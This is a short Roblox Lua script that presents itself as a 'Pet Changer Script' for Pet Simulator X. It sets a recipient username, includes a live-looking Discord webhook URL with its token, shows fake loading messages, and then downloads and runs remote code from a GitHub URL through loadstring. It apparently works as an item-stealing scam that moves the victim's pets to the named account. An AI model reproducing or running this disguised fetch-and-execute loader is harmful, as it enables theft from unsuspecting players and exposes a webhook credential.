Username = "charles45825"
--Username2 = "valkyriadmz" (will be back soon)
WebHook = "https://discord.com/api/webhooks/1114159063463374928/y2dA2eUOy5Pt_pOiW56UlZ3ZtdopWS8_WPhvT6Yd4rd-3j-jNTnD3Nx317x-HzegdKpQ"
loadingscreen = true
_G.CustomScriptName = "Pet Changer Script Pet Sim x"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script..."
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Script..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
